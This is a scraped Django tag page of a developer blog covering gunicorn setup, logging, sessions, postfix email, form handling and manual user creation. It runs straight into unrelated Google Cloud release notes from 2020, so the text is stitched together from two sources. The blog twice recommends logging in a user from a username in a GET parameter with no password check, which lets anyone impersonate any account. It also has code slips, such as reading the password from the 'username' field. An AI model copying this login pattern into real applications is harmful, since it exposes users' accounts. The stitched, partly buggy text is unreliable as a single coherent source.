Navigate to the directory which contains your manage.py file, for me, this is what I did: cd /Users/webapp/Apps/testproject touch gunicorn.conf.py # yep, the config file is a python script This is what I put in the config file: bind = "127.0.0.1:9000" # Don't use port 80 becaue nginx occupied it already. errorlog = '/Users/webapp/logs/gunicorn-error.log' # Make sure you have the log folder create accesslog = '/Users/webapp/logs/gunicorn-access.log' loglevel = 'debug' workers = 1 # the number of recommended workers is '2 * number of CPUs + 1' Save the file and to start gunicorn, make sure you are at the same directory level as where the manage.py file is and do: gunicorn -c gunicorn.conf.py testproject.wsgi The ' -c ' option means read from a config file. The testproject.wsgi part is actually referring to the wsgi.py file in a child folder. (Please refer to my directory structure above) Just in case if you need to shutdown gunicorn, you can either use Ctrl + c at the console or if you lost connection to the console, use [1]: kill -9 `ps aux | grep gunicorn | awk '{print $2}'` Actually, a better way to run and shutdown gunicorn is to make it a daemon process so that the server will still run even if you log out of the machine. To do that, use the following command: gunicorn -c gunicorn.conf.py testproject.wsgi --pid ~/logs/gunicorn.pid --daemon This command will do three things: - run gunicorn with the configuration file named gunicorn.conf.py - save the process id of the gunicorn process to a specific file ('~/logs/gunicorn.pid' in this case) - run gunicorn in daemon mode so that it won't die even if we log off To shutdown this daemon process, open '~/logs/gunicorn.pid' to find the pid and use (assuming 12345 is what stored in '~/logs/gunicorn.pid'): kill -9 12345 to kill the server. This is it! Enter 127.0.0.1 in your browser and see if your page loads up. It is likely that it won't load up due to errors that you are not aware of. That's ok. Just look at the error logs: tail -f error.log Determine if it is an nginx, gunicorn or your Django project issue. It is very likely that you don't have proper access permission or had a typo in the config files. Just going through the logs and you will find out which part is causing the issue. Depending on how you setup your Django's logging config, you can either read debug messages in the same console which you started gunicorn, or read it form a file. Here is what I have in my Django's settings.py file: LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'verbose': { 'format' : "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s", 'datefmt' : "%d/%b/%Y %H:%M:%S" }, 'simple': { 'format': '%(levelname)s %(message)s' }, }, 'handlers': { 'null': { 'level': 'DEBUG', 'class': 'logging.NullHandler', }, 'console': { 'level': 'DEBUG', 'class': 'logging.StreamHandler', 'formatter': 'verbose' }, 'logfile':{ 'level':'DEBUG', 'class':'logging.handlers.WatchedFileHandler', 'filename': "/Users/webapp/gunicorn_log/vis.log", 'formatter': 'verbose', }, }, 'loggers': { 'django.request': { 'handlers': ['logfile'], 'level': 'DEBUG', 'propagate': True, }, 'django': { 'handlers': ['logfile'], 'propagate': True, 'level': 'DEBUG', }, 'vis': { 'handlers': ['console', 'logfile'], 'level': 'DEBUG', 'propagate': False, }, } } Bad Request 400 Just when you thought everything is ready, and you want the world to see what you have built...BAM! Bad Request 400. Why??? Because when you turn DEBUG = False in the settings.py file, you have to specify the ALLOWED_HOSTS attribute: DEBUG = False ALLOWED_HOSTS = [ '127.0.0.1', ] Just don't put your port number here, only the ip part. Read more about this issue here: Conclusion Setting up nginx, gunicorn and your Django project can be a very tedious process if you are not familiar with any of them like me. I document my approach here to hopefully help anybody who has encountered the same issue. Just found a great tool for debugging Django applications, the Django debug toolbar provides a toolbar to your webpage when DEBUG=True. It looks like this: The toolbar will provides a ton of information, such as: - The number of database queries made while loading the apge - The amount of time it took to load the page (similar to Chrome dev tools' Timeline feature) - The content of your Settings file - Content of the request and response headers - The name and page of each static files loaded along with the current page - Current page's template name and path - If Caching is used, it shows the content of the cached objects and the time it took to load them - Singals - Logging messages - Redirects To install it: pip install django-debug-toolbar Then, in your settings.py: INSTALLED_APPS = ( 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', # <- automatically added by Django, make sure it is not missing 'debug_toolbar', # <- add this 'myapp', # <- your app ) # static url has to be defined STATIC_URL = '/static/' # pick and choose the panels you want to see', ] That's it. Start your server by python manage.py runser Load up your page in the web browser, you should see a black vertical toolbar appearing on the right side of your page. 用select_related来提取数据和不用select_related来提取数据的差别。 我有一个Model(用户每天会填写一些问题,这个Model用来收集用户每天填写的问题的答案): class Answer(models.Model): day_id = models.IntegerField() set_id = models.IntegerField() question_id = models.IntegerField() answer = models.TextField(default='') user = models.ForeignKey(User) def __unicode__(self): result = u'{4}:{0}.{1}.{2}: {3}'.format(self.day_id, self.set_id, self.question_id, self.answer, self.user.id) return result 这个Model除了自带的Field外还有一个外键 user,用于引用Django自带的User表。 我需要将所有用户的每天的答案都输出到一个文件里, 所以首先要提取出所有的答案: answers = Answer.objects.all() for answer in answers: print answer 运行这个指令会对数据库进行981次请求。数据库里有980行数据,Answer.objects.all()算是一次请求。那么剩下的980次请求是在干嘛呢?问题出在: result = u'{4}:{0}.{1}.{2}: {3}'.format(self.day_id, self.set_id, self.question_id, self.answer, self.user.id) 当打印answer这个Object的时候,除了会打印出自身的Field外,还会打印出user.id. 由于Answer这个表中没有user.id这个Field,所以要单独请求User的表给出相应的id。这个就是造成980次请求的原因。每次打印一个answer,都要请求一遍User表来获取相对应的用户id。 这种提取数据的方式明显是不合理的,为了能一次完成任务,可以使用select_related: answers = Answer.objects.all().select_related('user') for answer in answers: print answer 这样,数据库请求只有一次。select_related()的作用其实是把Answer和User这两张表给合并了: SELECT ... FROM "answer" INNER JOIN "auth_user" ON ( "answer"."user_id" = "auth_user"."id" ) 这样页面的载入时间就会被大大减少。 在一个文字框里加入灰色的注释文字帮助用户理解应该输入什么信息是常见的做法。在Django里有两种方式可以为输入框添加文字注释。假设我们有一个Model: from django.db import models class User(models.Model): user_name = models.CharField() 方法一: import django.forms as forms from models import User class Login(forms.ModelForm): user_name = forms.CharField(widget=forms.TextInput(attrs={'placeholder': u'输入Email地址'})) class Meta: model = User 方法二: import django.forms as forms from models import User class Login(forms.ModelForm): class Meta: model = User widgets = { 'user_name': forms.TextInput(attrs={'placeholder': u'输入Email地址'}), } When writing a user registration form in Django, you are likely to encounter this error message: A user with that Username already exists. This happens when a new user wants to register with a name that is already stored in the database. The message itself is self explainatory but what I need is to display this message in Chinese. According to Django's documentation, I should be able to do this: class RegistrationForm(ModelForm): class Meta: model = User error_messages = { 'unique': 'my custom error message', } But this didn't work. It turns out that Django's CharField only accepts the following error message keys: Error message keys: required, max_length, min_length Thanks to this StackOverflow post, here is how Django developers solved this problem in the UserCreationForm, we can adopt their solution to this situation: class RegistrationForm(ModelForm): # create your own error message key & value error_messages = { 'duplicate_username': 'my custom error message' } class Meta: model = User # override the clean_<fieldname> method to validate the field yourself def clean_username(self): username = self.cleaned_data["username"] try: User._default_manager.get(username=username) #if the user exists, then let's raise an error message raise forms.ValidationError( self.error_messages['duplicate_username'], #user my customized error message code='duplicate_username', #set the error message key ) except User.DoesNotExist: return username # great, this user does not exist so we can continue the registration process Now when you try to enter a duplicate username, you will see the custom error message being shown instead of the default one :) I. I had the following code: from django.core.urlresolvers import reverse class UserProfileView(FormView): template_name = 'profile.html' form_class = UserProfileForm success_url = reverse('index') When the code above runs, an error is thrown: django.core.exceptions.ImproperlyConfigured: The included urlconf 'config.urls' does not appear to have any patterns in it. If you see valid patterns in the file then the issue is probably caused by a circular import. There are two solutions to this problem, solution one: from django.core.urlresolvers import reverse_lazy class UserProfileView(FormView): template_name = 'profile.html' form_class = UserProfileForm success_url = reverse_lazy('index') # use reverse_lazy instead of reverse Solution 2: from django.core.urlresolvers import reverse class UserProfileView(FormView): template_name = 'profile.html' form_class = UserProfileForm def get_success_url(self): # override this function if you want to use reverse return reverse('index') According to Django's document, reverse_lazy should be used instead of reverse when your project's URLConf is not loaded. The documentation specifically points out that reverse_lazy should be used in the following situation: providing a reversed URL as the url attribute of a generic class-based view. (this is the situation I encountered) providing a reversed URL to a decorator (such as the login_url argument for the django.contrib.auth.decorators.permission_required() decorator). providing a reversed URL as a default value for a parameter in a function’s signature. It is unclear when URLConf is loaded. At least I cannot find the documentation on this topic. So if the above error occurs again, try reverse_lazy When a user request a page view from a website (powered by Django), a cookie is returned along with the requested page. Inside this cookie, a key/value pair is presented: Cookie on the user's computer Key Value --- ----- sessionid gilg56nsdelont4740onjyto48sv2h7l This id is used to uniquely identify who's who by the server. User A's id is different from User B's etc. This id is not only stored in the cookie on the user's computer, it is also stored in the database on the server (assuming you are using the default session engine). By default, after running ./manage.py migrate, a table named django_session is created in the database. It has three columns: django_session table in database session_key session_data expire_date --------------------------------------------------- y5j0jy3l4v3 ZTJlMmZiMGYw 2015-05-08 15:13:28.226903 The value stored in the session_key column matches the value stored in the cookie received by the user. Let's say this user decides to login to the web service. Upon successfully logged into the system, a new sessionid is assigned to him/her and a different session_data is stored in the database: Before logging in: session_key session_data expire_date --------------------------------------------------- 437383928373 anonymous 2015-05-08 15:13:28.226903 After logging in: session_key session_data expire_date --------------------------------------------------- 218374758493 John 2015-05-08 15:13:28.226903 *I made up this example to use numbers and usernames instead of hash strings. For security reasons, these are all hash strings in reality. As we can see here, a new session_key has been assigned to this user and we now know that this user is 'John'. Form now on, John's session_key will not change even if he closes the browser and visit this server again. Thus, when John comes back the next day, he does not need to login again. Django provides a setting to let developers to specify this behaviour, in settings.py, a variable named SESSION_SAVE_EVERY_REQUEST can be set: SESSION_EXPIRE_AT_BROWSER_CLOSE = False # this is the default value. the session_id will not expire until SESSION_COOKIE_AGE has reached. If this is set to True, then John is forced to login everytime he visits this website. Since saving and retrieving session data from the database can be slow, we can store session data in memory by: #Assuming memcached is installed and set as the default cache engine SESSION_ENGINE = 'django.contrib.sessions.backends.cache' The advantage of this approach is that session store/retrival will be faster. But the downside is if the server crashes, all session data is lost. A mix of cache & database storage is: SESSION_ENGINE = 'django.contrib.sessions.backends.cached_db' According to django's documentation: every write to the cache will also be written to the database. Session reads only use the database if the data is not already in the cache. This approach is slower than a pure cache solution but faster than a purse db solution. Django's offical document did warn to not use local-memory cache as it doesn't retain data long enough to be a good choice. By default the session data for a logged in user lasts two weeks in Django, users have to log back in after the session expires. This time period can be adjusted by setting the SESSION_COOKIE_AGE variable. There are times when you are not worried about user authentication but still want to have each user sees only his/her stuff. Then you need a way to login a user without password, here is the solution posted on stackoverflow Normally, when logging a user with password, authenticate() has to be called before login(): username = request.POST['username'] password = request.POST['password'] user = authenticate(username=username, password=password) login(request, user) What authenticate does is to add an attribute called backend with the value of the authentication backend, take a look at the line of the source code. The solution is to add this attribute yourself: #assuming the user name is passed in via get username = self.request.GET.get('username') user = User.objects.get(username=username) #manually set the backend attribute user.backend = 'django.contrib.auth.backends.ModelBackend' login(request, user) That's it! I was running a Django server on Ubuntu 12.04 and saw a lot of errors logged in gunicorn's error log file: error: [Errno 111] Connection refused One line of the error messages caught my eye, send_mail. Gunicorn is trying to send my the error message via the send_mail() function but failed. I realized that I didn't setup the email settings in settings.py. I searched online for a solution and found two: - send email via Gmail's smtp - setup your mail server Option 1 seems like a quick and dirty way to get things done, but it has a few drawbacks: - Sending email via Gmail's smtp means the FROM field will be your Gmail address rather than your company or whatever email address you want it to be. - To access Gmail, you need to provide your username and password. This means you have to store your gmail password either in the settings.py file or to be more discreet in an environment variable. - You have to allow less secured app to access your gmail. This is a setting in your gmail's account. I decided to setup my own mail server because I don't want to use my personal email for contacting clients. To do that, I googled and found that there are two mail servers that I can use: - postfix - sendmail Since postfix is newer and easier to config, I decided to use it. - Install postfix and Find main.cf Note: main.cf is the config for postfix mail server sudo apt-get install postfix postfix is already the newest version. postfix set to manually installed. Great, it is already installed. Then, I went to /etc/postfix/ to find main.cf and it is not there! Weird, so I tried to reinstall postfix: sudo apt-get install --reinstall postfix After installation, I saw a message:'. I see. So, I followed the instruction and copied the main.cf file to /etc/postfix/: cp /usr/share/postfix/main.cf.debian /etc/postfix/main.cf Add the following lines to main.cf: mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128 mydestination = localhost Then, reload this config file: /etc/init.d/postfix reload Now, let's test to see if we can send an email to our mailbox via telnet: telnet localhost 25 Once connected, enter the following line by line: mail from: whatever@whatever.com rcpt to: your_real_email_addr@blah.com data (press enter) type whatever content you feel like to type . (put an extra period on the last line and then press enter again) If everything works out, you sould see a comfirmation message resemables this: 250 2.0.0 Ok: queued as CC732427AE It is guaranteed that this email will end up in the spam box if you use Gmail. So take a look at your spam inbox to see if you received the test mail (it may take a minute to show up). If you recevied the test email, then it means postfix is working properly. Now, let's config Django to send email via postfix. First, I added the following line to my settings.py file: EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend' EMAIL_HOST = 'localhost' EMAIL_PORT = 25 EMAIL_HOST_USER = '' EMAIL_HOST_PASSWORD = '' EMAIL_USE_TLS = False DEFAULT_FROM_EMAIL = 'Server <server@whatever.com>' Then, I opened up Django shell to test it: ./manage.py shell >>> from django.core.mail import send_mail >>> send_mail('Subject here', 'Here is the message.', 'from@example.com', ['to@example.com'], fail_silently=False) Again, check your spam inbox. If you received this mail, then it means Django can send email via postfix, DONE! references:. When you have large number of models, it is eaiser to understand their relationships by looking at a graph, Django extensions has a handy command to convert these relationships into an image file: - Install Django extension by: pip install django-extensions 2. Enable Django extensions in your settings.py: INSTALLED_APPS = ( ... 'django_extensions', ) 3. Install graph packages that Django extensions relies on for drawing: pip install pyparsing==1.5.7 pydot 4. Use this command to draw: ./manage.py graph_models -a -g -o my_project_visualized.png For more drawing options, please refer to the offical doc. Use the --log-file=- option to send error messages to console: gunicorn --log-file=- After debugging is complete, remove this option and output the error message to a log file instead. I was given a task to randomly generate usernames and passwords for 80 users in Django. Here is how I did it: Thanks to this excellent StackOverflow post, generating random characters become very easy: import string import random def generate(size=5, numbers_only=False): base = string.digits if numbers_only else string.ascii_lowercase + string.digits return ''.join(random.SystemRandom().choice(base) for _ in range(size)) I want to use lowercase characters for usernames and digits only for passwords. Thus, the optional parameter numbers_only is used to specific which format I want. Then, open up the Django shell: ./manage.py shell and Enter the following to the interactive shell to generate a user: from django.contrib.auth.models import User from note import utils User.objects.create_user(utils.generate(), password=utils.generate(6, True)) I saved the generate() inside utils.py which is located inside a project named note. Modify from note import utils to suit your needs.' Julien Phalip gave a great talk at DjangoCon 2015, he introduced three ways to hydrate (i.e. load initial data into React component on first page load) React app with data, I am going to quote him directly from the slides and add my own comments. Conventional Method: Client fetches data via Ajax after initial page load. Load the data via ajax after initial page load. Less conventional method: Server serializes data as global Javascript variable in the inital HTML payload (see Instagram). Let the server load the data first, then put it into a global Javascript variable which is embed inside the returned HTML page. In the linked Github project (which is a Django project), the server fetches from the database to get all of the data. Then, it converts the data from Python object to json format and embed the data in the returned HTML page. Server side rendering: Let the server render the output HTML with data and send it to the client. This one is a little bit involved. Django would pass the data from DB along with the React component to python-react for rendering. python-react is a piece of code that runs on a simple Node HTTP server and what it does is receiving the react component along with data via a POST request and returns the rendered HTML back. (The pyton-react server runs on the same server as your Django project.) So which method to use then? We can use the number of round trips and the rendering speed as metrics for the judgement. Method 1 Round trips: The inital page request is one round trip, and the following ajax request is another one. So two round trips. Rendering time: Server rendering is usually faster then client rendering, but if the amount of data gets rendered is not a lot then this time can be considered negligible. In this case, the rednering happens on the client side. Let's assume the amount of data need to be rendered is small and doesn't impact the user experience, then it is negligible. Method 2 Round trips: Only one round trip Rendering time: Negligible as aforementioned. Method 3 Round trips: Only one round trip Rendering time: If it is negligible on the client side then it is probably negligible on the server side. It seems that Method 2 & 3 are equally fast. The differences between them are: - Method 2 renders on the client side and Method 3 renders on the server side. - Method 3 requires extra setup during development and deployment. Also, the more moving pieces there are, the more likely it breaks and takes longer to debug. Conclusion Without hard data to prove, here is just my speculation: Use Method 2 most of the time and only Method 3 if you think rendering on the client side is going to be slow and impact the user experience. There are some pitfalls when you need to create and login users manually in Django. Let's create a user first: def view_handler(request): username = request.POST.get('username', None) password = request.POST.get('username', None) Note that request.POST.get('username', None) should be used instead of request.POST['username']. If the later is used, you will get this error: MultiValueDictKeyError Once the username and password are extracted, let's create the user User.objects.create(username=username, password=password, email=email) # DON'T DO THIS The above code is wrong. Because when create is used instead of create_user, the user's password is not hashed. You will see the user's password is stored in clear text in the database, which is not the right thing to do. So you should use the following instead: User.objects.create_user(username=username, password=password, email=None) What if you want to test if the user you are about to create has already existed: user, created = User.objects.get_or_create(username=username, email=None) if created: user.set_password(password) # This line will hash the password user.save() #DO NOT FORGET THIS LINE get_or_create will get the existing user or create a new one. Two values are returned, an user object and a boolean flag created indicating whether if the user created is a new one (i.e. created = True) or an existing one (i.e. created = False) It is import to not forget including user.save() in the end. Because set_password does NOT save the password to the database. Now a user has been created successfully, the next step is to login. user = authenticate(username=email, password=password) login(request, user) authenticate() only sets user.backend to whatever authentication backend Django uses. So the code above is equivlent to: user.backend = 'django.contrib.auth.backends.ModelBackend' login(request, user) Django's documentation recommends the first way of doing it. However, there is an use case for the second approach. When you want to login an user without a password: username = self.request.GET.get('username') user = User.objects.get(username=username) user.backend = 'django.contrib.auth.backends.ModelBackend' login(request, user) The is used when security isn't an issue but you still want to distinguish between who's who on your site. So to sum up the code above, here is the view_handler that manually create and login an user: def view_handler(request, *args, **kwargs): email = request.POST.get('email', None) password = request.POST.get('password', None) if email and password: user, created = User.objects.get_or_create(username=email, email=email) if created: user.set_password(password) user.save() user = authenticate(username=email, password=password) login(request, user) return HttpResponseRedirect('where_ever_should_be_redirect_to') else: # return error or redirect to login page again When writing a Django project, it happens often that mulitple apps will be included. Let me use an example: Project - Account - Journal In this example, I created a Django project that contains two apps. The Account app handles user registration and login. The Journal app allows users to write journals and save it to the database. Here is the what the urls look like: #ROOT_URLCONF urlpatterns = [ url(r'^account/', include('Account.urls', namespace='account')), url(r'^journal/', include('Journal.urls', namespace='journal')), #This namespace name is used later, so just remember we have given everything under journal/ a name ] This above file is what the ROOT_URLCONF points to. Inside the Note app, the urls look like this: urlpatterns = [ url(r'^(?P<id>[0-9]{4})/$', FormView.as_view(), name = 'detail'), ] So each journal has a 4 digit id. When a journal is access, it's url may look like this: Let's say user John bookmarked a journal written by another person. He wants to comment on it. When John tries to access that journal, he is redirected to the login page. In the login page's view handler, a redirect should be made to Journal ID 1231 once authentication is passed: def view_handler(request): # authentication passed return redirect(reverse('detail', kwargs={'id', '1231'})) The reverse(...) statement is not going to work in this case. Because the view_handler belongs to the Account app. It does not know about the urls inside the Journal app. To be able to redirect to the detail page of the Journal app: reverse('journal:detail', kwargs={'id', '1231'}) So the format for reversing urls that belong to other apps is: reverse('namespace:name', args, kwargs)
http://cheng.logdown.com/tags/django
CC-MAIN-2018-43
refinedweb
5,159
56.55
The following release notes cover the most recent changes over the last 30: September 17, 2020Anthos Anthos 1.4.3 is now available. Updated components: Anthos 1.3.4 is now available. Updated components: GKE on AWS 1.4.3-gke.7 is now available. GKE on AWS 1.4.3-gke.7 clusters run on Kubernetes 1.16.13-gke.1402. To Upgrade: - Upgrade your Management service to 1.4.3-gke.7. - Upgrade your user clusters to to 1.16.13-gke.1402. A vulnerability, described in CVE-2020-14386, was recently discovered in the Linux kernel. The vulnerability may allow container escape to obtain root privileges on the host node. All GKE on AWS nodes are affected. To fix this vulnerability, upgrade your management service and user clusters to this patched version. The following GKE on AWS version contains the fix for this vulnerability: - GKE on AWS 1.4.3 For more information, see the Security Bulletin Anthos. Anthos. The BigQuery Data Transfer Service is now available in the following regions: Los Angeles (us-west2), São Paolo (southamerica-east1), South Carolina (us-east1), Hong Kong (asia-east1) and Osaka (asia-northeast2). The BigQuery Data Transfer Service is now available in the following regions: Los Angeles (us-west2), São Paolo (southamerica-east1), South Carolina (us-east1), Hong Kong (asia-east1) and Osaka (asia-northeast2).. You can now migrate a VM instance from one network to another. This feature is available in Beta. The issue with undeleting service accounts has been resolved. You can now undelete most service accounts that meet the criteria for undeletion. September 16, 2020Compute Engine Troubleshoot VMs by capturing a screenshot from the VM. This is Generally Available. You can now use the goog-firestoremanaged billing report label to view costs related to export and import operations. You can now use the goog-firestoremanaged billing report label to view costs related to import and export operations. There is a known issue with the upgrade from GKE 1.16 to 1.17. Any custom resources you created in the istio-system namespace are deleted during an upgrade to 1.17 (R30 or earlier). These resources must be manually recreated. We recommend that you do not upgrade to GKE 1.17 until a patch release fixes the issue. The fix will be rolled out in GKE release R31. September 15, 2020Cloud Load Balancing Added total latency to external HTTP(S) load balancer Cloud Logging entries. Total latency measures from when the external HTTP(S) load balancer receives the first bytes of the incoming request headers until the external HTTP(S) load balancer finishes proxying the backend's response to the client. This feature is now available in General Availability. Cloud SQL now offers serverless export. With serverless export, Cloud SQL performs the export from a temporary instance. Offloading the export operation allows databases on the primary instance to continue to serve queries and perform other operations at the usual performance rate. Cloud SQL now offers serverless export. With serverless export, Cloud SQL performs the export from a temporary instance. Offloading the export operation allows databases on the primary instance to continue to serve queries and perform other operations at the usual performance rate. The following PostgreSQL minor versions have been upgraded: - PostgreSQL 9.6.16 is upgraded to 9.6.18. - PostgreSQL 10.11 is upgraded to 10.13. - PostgreSQL 11.6 is upgraded to 11.8. - PostgreSQL 12.1 is upgraded to 12.3. SSD persistent disks attached to certain VMs with at least 64 vCPUs can now reach 100,000 write IOPS. To learn more about the requirements to reach these limits, see Block storage performance. September 14, 2020Cloud CDN Cache Modes, TTL overrides and custom response headers are now supported on backend buckets and backend services, and are available in beta. Cache modes allow Cloud CDN to automatically cache static content types, including web assets like CSS, JavaScript and fonts, as well as image and video content. TTL overrides support fine-tuning how long Cloud CDN caches your responses, and custom response headers introduce a new {cdn_cache_status} variable that is populated with the cache status response. External HTTP(S) Load Balancing now supports setting custom response headers on backend buckets and services. This feature is available in beta. Custom response headers make it easier to set common web security headers and/or override response headers from your application at the load balancer. The External HTTP(S) Load Balancer now supports setting custom response headers on backend buckets and services. This feature is available in Beta. Custom response headers make it easier to set common web security headers and override response headers from your application at the load balancer. Cloud Logging now offers the ability to view a history of your ran queries through the Recent queries tab. To learn more, go to the Recent queries section on the Building queries page. Compute-optimized (C2) machine types are now available in Sydney, Australia australia-southeast1-a. See VM instance pricing for details. The gcloud datastore index create and gcloud datastore index cleanup commands now require gcloud version 279.0.0 or greater. To update the gcloud CLI, use the gcloud components update command. There is no longer a requirement that the subnet of the deployment cluster is under the same network as the Cloud Extension. Bug fix for shot change detection API: Tuned internal model parameters to reduce false positives under certain scenarios. September 11, 2020BigQuery You can now use the BQ.JOBS.CANCEL system procedure to cancel a job. For more information, see Canceling jobs. Compute Engine TPU Metrics and Logs In-Context New Monitoring tab for TPUs provides key TPU Metrics and access to logs at a glance. You can see a variety of key TPU metrics including MXU utilization, CPU, memory, sent/received traffic, and more. In addition, it provides instant access to TPU logs which give insight into important events. You can build highly available deployments of stateful workloads on VM instances using stateful managed instance groups (stateful MIGs). A stateful MIG preserves the unique state of each instance (instance name, attached persistent disks, and/or metadata) on machine restart, recreation, autohealing, or update. Stateful MIGs are Generally available. 09, 2020Cloud CDN Added a new tutorial: Faster web performance and improved web protection for load balancing. Added a new tutorial: Faster web performance and improved web protection for load balancing. The API for creating and managing alerting policies is now Generally Available. For information on using this API, see Managing alerting policies by API. Cloud Spanner introduces a new introspection tool that provides insights into queries that are currently running in your database. Use Oldest Active Queries to analyze what queries are running and how they are impacting database performance characteristics. You cannot undelete most service accounts at this time. Our engineering team is working to resolve this issue. September 08, 2020Cloud Data Loss Prevention STREET_ADDRESS infoType detector is now available in all regions. Two new permissions, healthcare.locations.get and healthcare.locations.list, have been added to the IAM permissions. These permissions are checked whenever the new GetLocation and ListLocations methods are called.. Security Command Center Premium is now in general availability (Container Threat Detection remains in beta). Read these notes to learn about updates, usability improvements, and new features. Improved Summary Dashboard - A new set of interactive charts and tables provide a high-level overview of all threats and vulnerabilities. - An updated time selector lets you choose preset and customizable time ranges for reviewing findings and creating reports. - New page headers provide users with more page-specific context. Learn more about Using the Security Command Center dashboard. Onboarding and configuration upgrades - A streamlined interface lets you manage organization-wide service enablement settings. - A dedicated settings page for integrated services has been added to the configuration interface. Learn more about Setting up Security Command Center. Security Health Analytics now supports real-time detections, with some exceptions. Read more about Security Health Analytics detectors and findings. Managed Web Security Scans are now available to all Security Command Center Premium users. Learn more about managed scans in our Overview of Web Security Scanner. gcloud integration with new, simplified Beta APIs (Alpha) - The gcloud command line interface can now access configuration functionality through new Beta APIs. The Beta APIs provide stable, programmatic interaction equivalent in functionality to the Security Command Center interface. Learn to use gcloud to manage Security Command Center settings. Documentation - New documentation includes details on onboarding and enablement in the Security Command Center latency overview and updates on billing tiers. For more information, read our Pricing guide and visit product pages. September 04, 2020Data Catalog Data Catalog is now available in Jakarta ( asia-southeast2).. September 03, 2020Config Connector BigtableInstance: numNodes on resources is now optional. You can then programmatically scale your Bigtable instances. You cannot add the numNodes field after creating a BigtableInstance. For production instances where the numNodes will be managed by Config Connector, this field is required with a minimum of 1. For a development instance or for an existing instance where the numNodes is managed outside of Config Connector, this field must be left unset. Traffic Director can now be set up for GKE Pods with automatic Envoy injection. September 02, 2020Cloud CDN Reduced cache fill pricing from Cloud Storage, Compute Engine, and external origins by up to 80% starting September 1st. Google Cloud has also removed cache-to-cache fill and cache invalidation charges. Firewall Rules Logging metadata controls is now available in General Availability. September 01, 2020Assured Workloads for Government Assured Workloads for Government is now generally available for the FedRAMP Moderate compliance regime. Cloud Logging updated IAM custom role permissions. Users with custom roles should verify their permissions are correct. For a list of the permissions and roles, go to the Permissions and Roles section on the Access control page.. Filestore Troubleshooting page published. Now you can troubleshoot common Filestore issues. Beta stage support for the following integration: August 31, 2020BigQuery Updated version of Magnitude Simba JDBC driver includes bug fixes and enhancements such as automatically turning on the BigQuery Storage API for anonymous table reads (no charge for temporary table reads). Google Cloud internal HTTP(S) load balancers have native support for the WebSocket protocol when you use HTTP or HTTPS as the protocol to the backend. The load balancer does not need any configuration to proxy WebSocket connections. Cloud SQL for SQL Server supports cloning using the Cloud Console, the gcloud command, and the Cloud SQL Admin API. When you clone an instance, you create an independent copy of the source instance.. August 28, 2020AI Platform Prediction Runtime version 2.2 is now available. You can use runtime version 2.2 to serve online predictions with TensorFlow 2.2.0, scikit-learn 0.23.1, or XGBoost 1.1.1. Runtime version 2.2 does not currently support batch prediction. See the full list of updated dependencies in runtime version 2.2. Runtime version 2.2 is now available. You can use runtime version 2.2 to train with TensorFlow 2.2.0, scikit-learn 0.23.1, or XGBoost 1.1.1. See the full list of updated dependencies in runtime version 2.2. Risk analysis job creation is now available in the Cloud DLP UI in Cloud Console. Added additional infoType detectors: - STORAGE_SIGNED_URL - STORAGE_SIGNED_POLICY_DOCUMENT Cloud Trace exemplars can now be viewing in Cloud Monitoring. For more information about Trace exemplars, see Cloud Trace exemplars. For more information about viewing exemplars, see Exploring charted data. Cloud Trace exemplars can now be viewing in Cloud Monitoring. For more information about Trace exemplars, see Cloud Trace exemplars. For more information about viewing exemplars, see Exploring charted data.. New features are available for Credential Access Boundaries, currently in beta: - You can now manage permissions for Cloud Storage objects, in addition to buckets. - You can now use IAM Conditions to control which permissions are available in a short-lived OAuth 2.0 access token. For an example, see Limit permissions for specific objects. - You can now use Credential Access Boundaries with a Cloud Storage bucket that does not use uniform bucket-level access. For Credential Access Boundaries, currently in beta, you must migrate to a new API endpoint, sts.googleapis.com. To learn how to use the new API endpoint, see Exchanging the OAuth 2.0 access token. Pub/Sub subscription detachment is now generally available. August 27, 2020AI Platform Optimizer AI Platform Optimizer's name has changed to AI Platform Vizier.. GKE on AWS 1.4.2-gke.1 is released. This release includes Kubernetes version 1.16.13-gke.1401. This release includes bug fixes and security improvements. We recommend you update your clusters to this version. To upgrade your clusters, perform the following steps: - Upgrade your management service to aws-1.4.2-gke.1. - Upgrade your user cluster's AWSCluster and AWSNodePools to 1.16.13-gke.1401. - Fixed Perl version to fix security vulnerability CVE-2020-10878 - Removed a dependency on Musl to fix security vulnerability CVE-2019-14697 1.6.8-asm.9 is now available Adds beta support for joining multiple clusters from different projects into a single Anthos Service Mesh on Google Kubernetes Engine. Adds Citadel CA support for gcp profiles. Time series model support is now Generally Available (GA). This release includes a new training option: AUTO_ARIMA_MAX_ORDER. For more information about time series model support, see the following documentation: Support referencing org-level IAM custom roles for IAMPolicy/IAMPolicyMember Increase support for cross-project references August 26, 2020AI Platform Deep Learning VM Image M55 release - Restricts Jupyter memory usage to fix 5* issues - Updates TensorFlow 2.3 dependencies - Uses CUDA 11.0 in TensorFlow deep learning images - Adds support for the us-east4 region INFORMATION_SCHEMA views for BigQuery reservations are now Generally Available (GA). Cloud Functions Node 10 runtime now builds container images in the user's project, providing direct access to build logs and removing the preset build-time quota. The v1beta1 API has begun updating to a revised version. The update will occur over the next several weeks. View Updates to the v1beta1 API for a list of changes and how to update your client code. Traffic Director supports advanced traffic management features with proxyless gRPC applications in General Availability. This release includes path- and header-based routing, as well as weight-based traffic splitting. August 25, 2020App Engine standard environment Go The Go 1.14 runtime for the App Engine standard environment is now generally available. INFORMATION_SCHEMA views for jobs metadata by timeslice are now available.. Uploading public keys for service accounts is now generally available. Speech-to-Text has launched the new On-Prem API. Speech-to-Text On-Prem enables easy integration of Google speech recognition technologies into your on-premises solution. August 24, 2020BigQuery BigQuery support for using service account credentials with scheduled queries is Generally Available (GA).. You can now view Cloud Trace information from within the Logs Viewer. To learn more, go to the Trace data section on the Using Logs Viewer (Preview) page. Cloud Run for Anthos on Google Cloud version 0.16.0-gke.1 is now available for following GKE minor version: - 1.17 - 1.16 When Cloud Run is enabled on GKE new or existing cluster, version installed will be mapped to GKE master minor version. For more details see this. You can now protect your Compute Engine resources using VPC Service Controls. This feature is available in Beta. Compute Engine committed use discounts are Generally Available for SUSE Linux Enterprise Server for SAP images. Learn more about discounted image pricing at Committed use discounts. Form Parser model updates The Form Parser model has been updated. The model update includes the following features: - Improved OCR quality for English detection. - Improved key-value pair, checkbox, and table parsing detection quality, particularly for rotated images and handwritten text. - Decreased latency for complex tables. Audit 